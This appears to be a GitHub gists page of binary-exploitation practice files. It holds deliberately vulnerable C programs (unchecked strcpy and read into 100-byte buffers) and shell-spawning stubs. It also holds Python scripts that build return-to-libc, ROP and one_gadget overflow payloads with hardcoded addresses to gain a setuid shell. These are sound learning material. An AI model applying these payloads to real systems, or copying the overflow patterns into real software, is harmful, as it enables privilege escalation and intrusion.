Shivam Shrirao ShivamShrirao
ShivamShrirao
/ buf.c
Created
March 7, 2018 19:46
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include<stdio.h> | |
| #include<string.h> | |
| int main(int argc, char *argv[]) | |
| { | |
| char buf[100]; | |
| strcpy(buf,argv[1]); | |
| printf("Input was: %s\n",buf); | |
| return 0; | |
| } |
ShivamShrirao
/ system.c
Last active
March 8, 2018 10:03
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include<stdlib.h> | |
| void main() | |
| { | |
| system("/bin/sh"); | |
| } |
ShivamShrirao
/ addr.c
Created
March 7, 2018 19:52
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include<stdio.h> | |
| int main() | |
| { | |
| int a; | |
| printf("%p\n",&a); | |
| return 0; | |
| } |
ShivamShrirao
/ ret.py
Created
March 7, 2018 19:53
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from struct import pack | |
| from subprocess import call | |
| junk='A'*100 | |
| system=pack("I",0xf7e22d60) #convert address to little endian | |
| exit=pack("I",0xf7e16070) | |
| sh=pack("I",0xf7f5c311) | |
| for i in range(0x3b,0x4a): #just a rough range | |
| ecx=pack("I",0xffffd248+i) | |
| payload = junk + ecx + system + exit + sh | |
| print hex(i) #prints exact offset |
ShivamShrirao
/ ret2libc.py
Last active
March 8, 2018 10:03
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from struct import pack | |
| from subprocess import call | |
| i=0x40 #offset outside gdb | |
| junk='A'*100 | |
| pad='B'*4 | |
| gets=pack("I",0xf7e4c610) | |
| setuid=pack("I",0xf7ea3e60) | |
| pop=pack("I",0xf7dfe04b) #pop;ret | |
| system=pack("I",0xf7e22d60) | |
| exit=pack("I",0xf7e16070) |
ShivamShrirao
/ execve.c
Last active
March 8, 2018 10:03
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include<unistd.h> | |
| void main() | |
| { | |
| execve("/bin/sh",0,0); | |
| } |
ShivamShrirao
/ ret64.py
Created
March 7, 2018 19:58
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from os import system | |
| from struct import pack | |
| junk='A'*120 | |
| libc_base=0x00007ffff79f5000 | |
| onegadget=pack("Q",libc_base+0xfccde) #gadget address | |
| payload = junk + onegadget | |
| with open("tmp","w") as f: | |
| f.write(payload) | |
| system("./buf64 `cat tmp`") #because of null bytes |
ShivamShrirao
/ suid64.c
Last active
April 7, 2018 09:48
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include<stdio.h> | |
| #include<unistd.h> | |
| #include<string.h> | |
| int main() | |
| { | |
| char buf[100]; | |
| printf("Enter input: "); | |
| read(0,buf,250); //read 250 bytes from stdin (0) to buf | |
| printf("Input was : %s\n",buf); | |
| return 0; |
ShivamShrirao
/ retread64.py
Created
March 7, 2018 20:04
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from struct import pack | |
| junk='A'*120 | |
| setuid=pack("Q",0x7ffff7aceb50) #convert address to little endian for 64 bit | |
| poprdi=pack("Q",0x7ffff7a15b8b) | |
| null=pack("Q",0x0) #convert to little endian for 64 bit | |
| onegadget=pack("Q",0x7ffff7af2b8e) #execve one_gadget | |
| payload = junk + poprdi + null + setuid + onegadget | |
| print payload |
ShivamShrirao
/ mprotect.c
Last active
April 7, 2018 17:57
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <unistd.h> | |
| #include <signal.h> | |
| #include <stdio.h> | |
| #include <malloc.h> | |
| #include <stdlib.h> | |
| #include <errno.h> | |
| #include <sys/mman.h> | |
| #define handle_error(msg) \ | |
| do { perror(msg); exit(EXIT_FAILURE); } while (0) //for error handling |
OlderNewer